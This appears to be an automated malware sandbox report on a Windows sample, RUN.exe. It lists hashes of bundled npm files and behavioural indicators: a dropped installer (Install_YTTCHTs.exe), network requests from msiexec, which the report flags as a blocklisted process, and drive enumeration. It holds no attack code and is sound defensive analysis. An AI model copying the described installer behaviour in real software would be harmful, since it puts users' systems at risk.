C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\glob\LICENSE

MD5 72480347f4e847c91bbe6207b7567338
SHA1 1696f694a30db0edfd6874f6d7794efbe23236fc
SHA256 cdbc258d13806538e727964c2436a8806e6e2496ccd616224aace6f7bf98dbc1
SHA512 3ad7417dda1ae4d8f8c388f97d0b37f4757d3385c04a267b74b18ccb5abea901124d9c088f110ebe119e90310829c723f8d7f32de5a887ef3155d6130983e43c

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\glob\dist\esm\walker.js

MD5 337ae5029c379b097072b113bc800507
SHA1 64396efb17055153f3a6f6594b23e1cf5e403027
SHA256 6a89448d6061621edc2070cd909a9e539feb4f1223372c83a3adc2f2cc4ff25a
SHA512 eb6751bb5698c514802e208eee2cb1eec89a356fffec3ad8036eaa30a0939b8e994d01bd3d1608e63d0a875218e7c7366d3285ed0c1e691ba433a134a8e967e7

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\glob\dist\esm\processor.js

MD5 f550c310248c78331dc0c7c3800af3cc
SHA1 2a7bfcc7db2f494f1eb6cbc9d2c8a4931606418a
SHA256 89bab0333fe9efc322d1e8458c06068e7eebec6aa88151c159dd72d9cd119c1d
SHA512 c537e8d030416ff688172257e0d0ac82fa52c3b47de931160b8f592ccc6fa8638c56a6f5fee5bf9e82fcfc23586c2808717c44f2bb331ff1aa49e98a2f3d89a3

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\glob\dist\esm\pattern.js

MD5 bd61679bb6dd76e3811143a2515cf06e
SHA1 a4e03afd59f552c24916f0d61aae418e3f3f1746
SHA256 a1fae8847d582a4c19c874ff8d93c40e8efa4f33da26f713824c59073f15d814
SHA512 d1fc37bfbe7752203974f01ba47b0aa9585eeb4bd35550aed59a33d4c99565073cd07fc566f3217f1ad349d332b376779d6fdecb0fc64b9adc611008acb531b4

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\glob\dist\esm\index.js

MD5 486ab8d51e13ec58df0601c16c122bd6
SHA1 c47244b95c0ad31b52d9906bbb573b381eb0dc54
SHA256 23cdf7d54725bf430c6bba9f0a76267eac6983dd2130129a5207aef3a0a867f0
SHA512 f3fa35ed08409351c01ba7ccaa2cf0015541ef911eb1c1a0697bf54d117f14d015f603a7e2fecb44600832b0dd97c15e648c5069e0bd63f9f1fa88e172e48923

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\glob\dist\esm\has-magic.js

MD5 f452da300a57f72eba10fd3338a33106
SHA1 60c05e7d2bdcbaf2d02e679bf377c25d5e7d7831
SHA256 875f1dc7229d850e9adac1786cf1f0fea3a718f4e91242049be0e409c19a8e02
SHA512 bdf4eedea26e320d35dc33e4b3cea19396ae2b6e3707f5b72038bf3d5fc704304c983d7b56a8e3f2d9faaa31397089ff91c22167363cb842e0fb89bfdc654f01

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\glob\dist\esm\glob.js

MD5 489875441e7385970cec6246a867ab04
SHA1 cec4d419da444c846418c025128dc57fb341fa8f
SHA256 4294ae83be20d6a4d1dffec38ff6bf0773b88d686aa595f82b1eaa04f10f0a3b
SHA512 fc494238205d63747294099a10a1c77a666a7bb95bc1edd41c4ea33315ffdce6292466c667b29713db2020506ec06311f1e00b23b0953e9886c7bdeba319afc4

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\glob\dist\commonjs\walker.js

MD5 b1582d4a9554012d891bf077a7931d34
SHA1 8fa2212e5287afce057e4d06424fec29111d9b9a
SHA256 92dd4e831c7ffa00b61a871221c9240067c43ac77756b7111339bc482ab2c4c8
SHA512 8830fae4e30f48d9a314c5f812e7eac0d5a1c85f8c6b8737ecb33734a6011f94f817bffa759eba38bfc3442dd180a6620483607d3c6812d60ef40faeb91950b0

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\glob\dist\commonjs\processor.js

MD5 37353d862e7c28eec6f1bbc0fbb016e2
SHA1 f22e4431c8d88a005320091da94b51e5eb41eaaa
SHA256 67101fb330007e0fa15e49a9b9d4c9cd919ed6a5ef7ebacfed181372a1648899
SHA512 d8f448063baa96f96b9b3badec91a7cd0a49bd6d59d4284cab1fba8619b96b68c9fcdd4acfe227c5ffb171c7f00d2525894fc02022ae4c8aab58870507c527a1

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\glob\dist\commonjs\pattern.js

MD5 c67deb4520a0e3930a9bc845dbc2b4c2
SHA1 2528c273864f2f7bc1ce757344e5aa889d162876
SHA256 cfff55ccf92058aadc067d904f17e78ecbfd749392be12b2c17f8da6b61bdaec
SHA512 bc0e62abf578849e8b9b07773b5efce024026b7530db41f2e3914c88a84dd4ef143f328d1a9770885b509c19ae4c3e69a159d1d434d111728431eae518f1886d

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\glob\dist\commonjs\index.js

MD5 e7ab0fb137dcb5cc862fbe1ab2cd7d85
SHA1 342601487c426b0bfc2010cb2c5e792aea12e805
SHA256 edad9c6e38c0338f940a098d7532f30d5566cc5c81a587d3b82b51e5a15fb678
SHA512 cd66a8ff2264bfb7d86aaa0eb972603ac6d3057509e419b8158e49c6f784f50a192f3c755b18aaef8cbbed8d856972c15be8a0a3b082a2008ac9fd1beb7c36f3

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\glob\dist\commonjs\has-magic.js

MD5 078fbabb35426591cb06fd1199442926
SHA1 e5fb79330ec44fd6ad4bb48c96d5f591880cbbd6
SHA256 1e4a9acafa68903d5331e17635339ca59c52b71152e82e195438adc46ef7381a
SHA512 48dad09af0d65a7d9eb68a2199b33751f4351d0f3545d4d670d67b2d9f3077da9049ea2187d0e972fd564e39c2d3590d7aa6dae9c38497e55b48f4e5c06c1087

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\glob\dist\commonjs\glob.js

MD5 b40f4a76bb4f1b80a8e613345e75a2a4
SHA1 c1f345affab0826e89e28c4d74b44c393b05bc78
SHA256 24896d04e4a5603433a5fea82baa55ba2a8df27d13d43eeaa585be935a2d5867
SHA512 be29b91eb032e81f0a0d98090ec75ed9319710c1f3ed19ae86ac14e031de0c52c679b26285aeb729210e075fdbf57290c44885dd50ec7331c313caef864b6c64

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\gauge\lib\wide-truncate.js

MD5 9afedfe565b7e647cd86afe30ca30f17
SHA1 e3872150672c271bd72b4bd700ccfda9f0b8dcb3
SHA256 0c313fa1c5e3ac4f064993e88ce4c074106bbd4154d90f291e4c0c42d7147004
SHA512 6464d0393df7292169b920b729a99731605699d1e8080fbcbe714ac85b0a51bd7d52282247f6e0b8b22de8f7baa5101182eedb45d6375160657773f90d4aa19a

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\gauge\lib\themes.js

MD5 efe93779c76fff0cb66101238dff30e6
SHA1 0531c3c5b353baab97bd347354566af214a214a4
SHA256 6a2da219cfc714ffaacde2afb26a5dc3025baa9f984fb1191e69a2e0e0c502d8
SHA512 788e9d371a0824953f7e2cb4b25b7700e699184118ff01d5ee074bb3bb68b7e062781425f5205a8caeaedda8aa6ca4fbd3d94eb1f1ffcc8e1f4ad7ae76457254

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\gauge\lib\theme-set.js

MD5 10bc47f2ccada730a0d544caa1bfb745
SHA1 36d09fbc9383eafbec496b336cef184eca0dbf13
SHA256 f7b13a94bbc5e1796f407f6951c452192a7084663b467e735f2c9f9957292409
SHA512 fddfa21b91719df0a69a02313502aa69ea894b2f07dc6cb1a1b8ca637be2b423c24e62dd11f907d859c1cbb1eb1cea7a9fee0f7954f8164ebe98f4a154e2b491

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\gauge\lib\template-item.js

MD5 f0ca63be83f97fad471abe7e2bc09754
SHA1 9bb0e93dc258fa396a9cd84870c477465c6a6225
SHA256 de035282bf53b20e4a2b79a734ad9088e10d0b34bbf0d40571b138d0e144ca55
SHA512 78b37f1e2058770938495f78012eb4328544f0b0f016d12a16f5261190c575c73380a6856491b6ceaceeac95ca0dd9c81716436bb44facbaa3409d91d2ba08ab

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\gauge\lib\spin.js

MD5 35d56b687e0e510544d77fb01f350406
SHA1 b2a1975a8a0d714909fe8d5056804700fefd11d3
SHA256 4ddb202944fd4e556edc68107b1a1f33dd25f1910876d2bf04eb5a58ae060c9d
SHA512 d1a19d4aa31dbd4b1793cdfd9b388004e948636c86caa48120e49a252f3922f4c611c9ec70fa3ab043042c4797c89248607a627025eea1483c2327751f880b95

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\gauge\lib\set-interval.js

MD5 cf1c3e0e4bc3b07adf812b1c70e8bdbd
SHA1 5c2c33590101b8947fdfe9a22ba1d17b1f1e4d70
SHA256 19d2fa52118a39a7810efeb7bce45418f3e55ee7b445c85811d07a2f73b7bbb7
SHA512 d4d9f8dd9c997ecaf5a45a88e6627747701b38995efc956caf611a3679499896c08134a797c51a90b0a5a1dad71b0c6a7f65badec68f568f9655bd486c7894e4

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\gauge\lib\set-immediate.js

MD5 e5cb7c218a0f9437498fa48539dd3dd2
SHA1 0ee3511b6dac6bd821ff613bc07feafe664ccf3f
SHA256 90dbb2e127d9b971731b2094b2516a463243e4074367dd4129fe2849ef598514
SHA512 d712323110de5977513f9bcfd945bbb3310a4c45dac8cac949a27f7e99f20e0a1a63e200e8bfdc56aa756e3fc670724e953521cbc6c3a2a2e06afadcf845dcd1

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\gauge\lib\render-template.js

MD5 cf43109055cafca38dac321184ccc156
SHA1 dbdaa677b6ecccbc84af96c665d37104db42b092
SHA256 24b1e5d87bee1b0334c6b7e92c9883f8c818568c88dd3f009792d76daf5f4d65
SHA512 67b5ae37077e8c9fb9b97cc674c550c3be156c273453f3343829a8c3da3050ed60226c1907975c558c1c7ce3f48182494fb8a67accf25685ec4ab40bcf08d041

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\gauge\lib\progress-bar.js

MD5 aa35e2f28213533f809e8b5f9eecbef9
SHA1 3c6dc3b1d35c115d4e712647941b6223a54f4062
SHA256 e0bf26e14228cb79c8c763e345f0fd5b6da71e4564e1229ad2b8c40124e1d16b
SHA512 817b2375dc4d57de2367f9b0353896c6508ff377453d0cd639af93a1d0d4123a5e7df369339a68fb379a7876a21c990b7a55a1baf835816a4362e13fd17e97d7

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\gauge\lib\process.js

MD5 337306f3fc6274ecd4f9e7c7ceeffb1d
SHA1 8710bc75e47006d96f52c5a8ce8ac224f3e2356d
SHA256 742bd2d12a7786e595955c8a846dbefe88591df39c2659491bddadbb8ed7dae6
SHA512 ddbb842e803e1f170adf8ef41e209eb2cd0b857f2605e816ebefae3f4c9bc40f70a4fb1b32fbfeed04ed2465d8d19be573a3958df51df7503817766a705a9de4

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\gauge\lib\plumbing.js

MD5 ea9b89a82c6935dd42f43f4a91cd4b3e
SHA1 ced271efe695d542670cc84c98435590956d97e8
SHA256 1e7982a4080950347c5c4a33c6a4e7e6e5a6c0ae0e0fb87301e62b48fc3a75f1
SHA512 2d47928ddcb872fb0336ee5fac0389dbbf94a2a1148005783a67ae0cab9a2707f0beca660aaffb2383602f42e2d41f5bcf4b03924828613ab8e36c74e9a1f5f3

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\gauge\lib\has-color.js

MD5 12bdbddc59cab41a8daa15925d883576
SHA1 c98472fff9ca49b7df18eb1ff15d41cb0d2af64d
SHA256 bc77cc5732b948d7fe113b31ff78972d6ea336f8d15e8547542007657d41dc30
SHA512 087b2aa7b423b7f173096091b36cce6269df4d768ae80fe818044360114753d7f5d968ab8f1c0b3c8c130cbc45176ac7e6a9369325ffbad3e6b89c43c39a71c2

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\gauge\lib\error.js

MD5 528e2cb56f65929aa4376e585005f1a4
SHA1 04e38f90829460d150c24677f678be9c59a1986d
SHA256 2957dc2045a462606df224526d880fcc7a472bc992a74b0db9b23bf1984a9b20
SHA512 c49eee8427b3315ea6866f094c55db240b6d7d889a520cc3fb0400ecd25d59c064e9c137fb004f657b03d2f21be56c00fb7abef9e0ef2462d8b9ad75c112eb6d

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\gauge\lib\base-theme.js

MD5 c2d6986c3f109d0207dd06ba223cfb27
SHA1 24692c6c9557e081c53383fadb23dff2fc77233d
SHA256 7a6f7058c9f54eb3ee04ed5b3e4afad0f3abfd0b658a040e85ae8f4a455b1d5d
SHA512 782a011f8af385dc2db12d1ea5ae92923ba156b5068e095de507d433af27f1ab0dbf4f0a8b83a39a6890a58067dafa5e1e4efe030f1978329f93699ce1b910ed

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\emoji-regex\index.js

MD5 0438b0678667b951cf518a14560fa0b7
SHA1 e678799abbf2035d94ab0114ae0783b36a3e5994
SHA256 c56978800e47f095cfbfe96712b5e78d150d1f62e32bb4943675213fce481ef0
SHA512 75924c24968e298b1496170a66624b97a76a77fb4ce5968e7c097ad227401256752d9d28c8a1f84d313ce4b06f9dc9b20e3f75d81398c8951b45375ccb013e3e

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\emoji-regex\es2015\index.js

MD5 8f12b24a27ff5f2381a4a1568475eaba
SHA1 975c292ad2c1f09c53d0c9f53db5e66fd26fbbfb
SHA256 8718dea4d28647912918dba60545890dc10ae672bfb186b6ec0af3fc5e826137
SHA512 b70e68def6e8b15cdc9ef8bfa1326611c4bf83ad8ac461511c6af1ee2acdaa182ae9336e1f7f8c171c9931d36d5d9347542d364605d714c81a90032afedf52e5

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\diff\lib\index.es6.js

MD5 b0189fc844758ea7861a33d4cf3deaa2
SHA1 42b196484a16db7a66eeb56906ed26e2182799fb
SHA256 69694883a1ee6ef36c17144e2eb41e5d75b8c0f487cae980fd536bcab5960931
SHA512 46558e8dfabdbf10c92cc41358526b4d779a5e256303032cfbfaaa966d0283881fdd97380d494066efb210172eb5a6544d5906a29972db2feb9a79c5f972b6ed

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\cross-spawn\node_modules\which\which.js

MD5 2f112ac3fed09f7bc11e3f78c096e435
SHA1 cfb29894630a310ff6d56c91ee327a076ced7179
SHA256 76845e1fe7851267fb7ee72b18f2d916996d330150e31e48f4657a79e9b46b5b
SHA512 6e5617ff8dcdacdb444a61fb55aae7d19dd6addd175dc299bd20e8a6e1bf13ee105f53dac49033d0775561714b0093a88ecd9e865bdb8ddd7bb7bbe9ef990214

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\cross-spawn\node_modules\which\package.json

MD5 6bcb9e5778d80ea1512a98d73d4e3c9a
SHA1 402837c5ba60f95b309957adc4657b8fe4fb1f05
SHA256 43010039ed5e89f7186960be682b3cb5cda5ab6cdfb06cbfd4f081cf0e7b4260
SHA512 4548011d1e4ed9f5d7fb5e408476a27b2a19f3beec5ac4a9bbddebc700a77ff0fb168ecc4917576a18f22d262f82649e9ec0c1242af752a7cfa0321ea4375aad

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\cross-spawn\node_modules\which\bin\node-which

MD5 ab7317a95d1f704cb183d7c438a3e890
SHA1 5b6b3e1838316fb3f1b3b4194cdf49db0674eb17
SHA256 055f0ac4eed1a1591d033d59462972968bf3483b4cc07e163589569c0fb999f0
SHA512 322a3fdcbdc0ab2240acda547abe636d51f7f2114200491f7fc66c4353d43d37a4052df0d32f29ede80c8a768d312efae8ed28639f55c2e5a678f306a45986f9

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\cacache\lib\util\tmp.js

MD5 1d8e64ea848e005e1d0a771f1465a577
SHA1 cf9d2fe73fd6195f7b53c6b13cda15f40802f8f8
SHA256 9bc9bad862208b2ee66aeae5222d8b1d8d1d288f335fdf3ff998ad200f71ce64
SHA512 2a0a1d57ed240c9a0e95f1b87306eb66583860c2c88148db6ef5979f6f6f06e4bc6eec9fe9d6f2ad21506c4234a88404fcd155dabd82d6b507d0ba53502ad5be

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\cacache\lib\util\hash-to-segments.js

MD5 4fde78cc8125248b8abf8a9831d497c1
SHA1 a6f608135b099314b8cb4bb36c206d2f93bf2585
SHA256 ed10c878cb3c2b8570a32954b52da3c49539549f64e36b3ce3ab38d7e524bf19
SHA512 11187c46ab16c06f8af585c0a5e55e4947da81c3967fb8d127e83c58079d4d0d4343023374ecaddef4f53123e232d9c2f396bd0dc8832a01e779b4cab4d7fc6e

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\cacache\lib\util\glob.js

MD5 a93d25b2624be6221c62e3b3b437666d
SHA1 a4ce33b8a230dad740d44b6a4f74b4522e59fa4d
SHA256 a9fd56a76f0b4c39ffd94785128e79ddbc337210b9feb4b09530616948adeb69
SHA512 58baf4c9a29291ad3bc559f421e393a450e4332b13bd2f664a1fce45769493093c8327d97fc821d15790610b40015c0ca41596141216a2c121be42d1ab89b3c8

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\cacache\lib\rm.js

MD5 308021f53c321c99e1a120e70f1aae22
SHA1 e8d9e66e76fee498d27baa38ffcfd3972f33be96
SHA256 5155f5560ed63bea74732c87d6a10732d5c6e5639785dcfdcdcf93a01943abf6
SHA512 b0ab2fadfa782230c424b3e91dd0eb560a188e998d7888ca80ce41ceed8cf71bdafe4c5039aa1a17a663d5502fc53188219c78452e0be62c72e5e56fdcdda766

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\cacache\lib\put.js

MD5 19d056f5ccc691f09346ff0166058e6d
SHA1 070a4a3d6739c9808599c6f1dc860ee2aa7139b7
SHA256 b131954efbcb17f785e93278c53f4b0491c53009698b937ef68bbc7342134872
SHA512 de680e1a1370bc139697a55bd0987d798733dbed00edb78808a453bc1c2ba581e1c924ecb3cbb426e98a90693020e60956194307f7210b4e2d2b08f55ef047f4

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\cacache\lib\index.js

MD5 8b736f68cbf8df8c159f752dff04e264
SHA1 c11f68d63488e208186e21037b97455d4c2b5489
SHA256 56745bdddf064be6ded0e82452c7327c3a960a82d5fb26b021aef41fa01e2b94
SHA512 1cac2602b4d0fcdf199f22e3420b335d9242ee4b1f446784d648aa3e48eb1c6e9481b15bd4bc6b8ecf39cd5869d2693df363425642834fee2d767e4dc84676a7

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\cacache\lib\get.js

MD5 182421852249bfb3b527c046c9cb37f1
SHA1 065b24b2f79c0005b24f8bd80c271f3eae43ce55
SHA256 4127c3adb8bc9f530dcb6ed80a0c6c00288f1db8c6939146957d03454cac06c9
SHA512 4ba327b91b332c38c3f191d38f148d1f40e436a585dade62f7bb07b35eee25c62e10d8a252c0854673fe3a140bf9745ae3649e946a59bf54f7bafebff9ab5f11

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\cacache\lib\entry-index.js

MD5 e3581a4800e872c74d33d428a43c45bf
SHA1 5c9d813706a32b323f641680649ada4cef02a065
SHA256 75f21c2ef3b790dfd8a5feb97504988d904790f0d3d6468939177d7e9192a274
SHA512 133d25deea97d18b77fe6239ea481ea137270e3f331be08d514080e78b98a4d0133306685d70176010a4bb999af38921535f15720dcc173b0c3894f47816a2fa

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\cacache\lib\content\write.js

MD5 851dde26bebe68f41e7b8488396d382a
SHA1 cef7a585557fdb45f906e449f9f99bad59dae7c5
SHA256 5af02bb8b36884b211d779d4c5e50c425ed9fd67b925f7e8becbc1750e4f7e8f
SHA512 273d241aa04831fcd40d8df8d5922285c8588d0a4bcaf5a058bd60beebba99ea506d9891f4ffe07edbf64dfa9563e05a4f14b7e5bc4f735d982a6e8f7827dc7c

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\cacache\lib\content\rm.js

MD5 4e1bd0b7ec57f9b1f6ded18c48f327bc
SHA1 875d264c38047981031f7ca65d65b7d8523b5e3f
SHA256 f3f706375bbc097bc0fd091f0eea8d07b98b8e1f7a1d203f3b87337312272672
SHA512 bd2e2d5d96f230a0909a9063e9d105c4c0ae5815ccbe2dc4a0461b02aea06d9a0b79c4912b8bce00ebb9ddc73e40314ff7510a684ee28187f04f6dd5e212975f

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\cacache\lib\content\read.js

MD5 a3738489fa3632ae7ecb44c63b38628d
SHA1 3c4e8f1e4799f5aa913204888f54d81e65e53ed6
SHA256 dbe618214f63c11a58aebdc97c3f646bc794df809f5c773e34efc9486202ce3e
SHA512 da19da7902acbc36c187682e13422fa141a886e63e78f2a555804e0ba0fd450ae89901e66e954d44ffbf680938b3c1445e190fdda24897dfa5b35ac79ec5a496

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\cacache\lib\content\path.js

MD5 c66683453866ddccf0a4b5a817a3c87c
SHA1 e28059c54a7ca3cbb9b5b039db061a24e533d880
SHA256 7ec9682ee3472435d866bdd35d18e2d570ffe98621bc230f30d31443bd04d8f7
SHA512 a19345927f9275a09fd7b4f06858bba5b513751af3c91885face9435c923993a2862ea91eb6c6492208ee6eddd017f1b880ccd35f8ecbc86d0ea7af0d173d3da

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\brace-expansion\package.json

MD5 4b877fcf0149128acf15926c546b8b98
SHA1 7b48982e1637dd5dee1f571cd7c98054b46fb032
SHA256 4a9ae315ffc10674f4a71ea4465103e77426d86aeb2c23737607181f3f31344f
SHA512 c2197efe496db792bbefce4d68bbaf63204a53267e8a36bf476521718c5e67e418165dec16f260c521b18c4b54a65862fe94a1a2385c18c191565fa7da900db8

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\brace-expansion\index.js

MD5 795f787be90f6daf96d64087f2428723
SHA1 6c479385902b5adc1b4343472922324aa312296c
SHA256 6f6a12f42623bf53b6561d46c5e37c0f26b6471ba53e83c3b933fb2c2f139742
SHA512 f093a66ef5f0e79085195571421a3ebc7681bbe41add742fb5a7efbd660fc3f6ccd6e6c8a95c4334a91232b6e0a45aebb84539ef7fef05fa21c63e36d2757175

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\are-we-there-yet\lib\index.js

MD5 a9c06e81da780a0568fa5a53e8d7e4fe
SHA1 d154805f279e1f7708732426e960ab7990fffbe2
SHA256 7a427679a9b245f02d66bb09aeaa5337bdff29375d05f3f34e7133b61001bb69
SHA512 79c8f738b2397a79f192ea55e6145a4333c3b555c230d32840a06ca9daccc5b75f547ae56dcc28561f2d6aea9c033c24cab385e344d8697234654b6fd909ba2c

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\abbrev\LICENSE

MD5 e9c0b639498fbe60d17b10099aba77c0
SHA1 34d4249a8ef23970810fd3018b9399b1268dc052
SHA256 9e0d5c7989f7e9f07d7c4b158aceff270f235eb7464ace41c5e7b200834a43e0
SHA512 fba8220e3ddd6d455f36564e3c91c38a508a75d26eafba9b1f761216b1fa3fbb2a01a4736694d90fe81d4dd87f81d3215c8cc11a48f3d38d231dc4f3402d5adb

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\@sigstore\sign\dist\util\json.js

MD5 b15d152ff80150e679cee7f441091b36
SHA1 02a44a2b9cd6c19b1af7cdd0b7043747cdba72f0
SHA256 cb3adb661fd056e40c147d0036e854dd742630a61935810ce03f9e5ba2ce2afe
SHA512 7203e1a533676f6d0efb1df990ad4fe012e5a1b71ff6aa4b9ca3b7b9f9c497b7db8edf002f00b38c31cae5ca288a3af3bd5428a194b2a8ada616955078cf4233

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\@npmcli\git\LICENSE

MD5 a7a567b0c15ef6f269b858ec3b85eb11
SHA1 1f3474ea2534827d050295aede1e340868483d12
SHA256 565acf764f4583abe4cf4b02128f01b5d4d1b4c62c253e92df7ed6a8a8ad406b
SHA512 61ee613b7ce22b8149ed7e54e9919172db70a2254ddd30645488b6240f943d8b6524ab54043ce9af0f1b3dd6eb7674966e69dcafbb710211d9c20a42e5dc7c1f

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\@isaacs\cliui\node_modules\string-width\package.json

MD5 6370fd65c542b20d05beb70fd94e5aeb
SHA1 53ae7a1b3953e86624927fec8421d453d9c88e41
SHA256 adbcb3b95ea29c1f2a91a0af600fd9136ce408a38622332848ba4630dc473659
SHA512 37be93a008f964cfdd4c92401e8a9b815ce51b6b5c8c711e0fbcabc119235d1f352a26c9d03c4203ef82e696c28606762474dfd5efc960e6b6df1afd47465729

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\@isaacs\cliui\node_modules\string-width\index.js

MD5 e425955ccd341cf2b2b4b95366b687e7
SHA1 84e24b625a49263b8192b39507002656e64f8302
SHA256 4508758772b1f52850b576ca714bbfd6edb05f8d36492ceab573db47f5cd7d84
SHA512 258878009e1bbca7e3f91a2ced8c531dd46bab19dc26a39e0c8c00cea92feda5663e2d652f3a21eed87593d2f887f16fbb7a6aac0bf3e91a2843e102f5923059

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\@isaacs\cliui\node_modules\ansi-regex\package.json

MD5 d2894a8ebbc4840e85527b8c051dac86
SHA1 dabd0c9882fb3b8c12222595fb92ad26b60671a1
SHA256 8a331bebfc9225b6afe7a15542843a78ba7943454b6261cfe60b734513e1d32c
SHA512 7266a2f0bbbc398c5e4a4f2d66670a205d1cd35f0d11a89840b56f221057776bdb54723d7d767ddbd1861379c01ac660fbbeb36dbb5374e53756ae9afbc63e8c

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\@isaacs\cliui\node_modules\ansi-regex\index.js

MD5 4b05188fff08c3f12812c29561915d54
SHA1 bd2dec3594c15a8ed8cc9d45ee8c2a6fdedcfb37
SHA256 110c5fe554eccdda9b95be9a33edd4d4e867c8432460a8f39c9b7ff841b00772
SHA512 894b656903a1875c37c5d7cd9aa14fa7613961ffdbebc3ceda6d9ba766d46faf9369a811827389f6dcc101e65a7c935fb83e40aa707453fb203a675752370670

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\mock-globals\.gitignore

MD5 8da13f306c8c0f4f4a32960e93725b42
SHA1 b9ee3f4a8b64284a8f698206993e4ec2cf83f66f
SHA256 ca7a3d5544beb40beb598f6ae22527e8cbcbc29b67f241ad9e572a50a89848b0
SHA512 59e6493139d8a3af2889fb337032f41124a53f5ca7ee06906c97d4f6cf0fa942f28b3b7ce2d449b10ea0a01a39282397984ea46df43571d2a5fe753fc20bb6cc

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-18 19:24

Reported

2024-03-18 20:23

Platform

win7-20240221-en

Max time kernel

1559s

Max time network

1563s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RUN.exe"

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\J: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\SysWOW64\msiexec.exe N/A
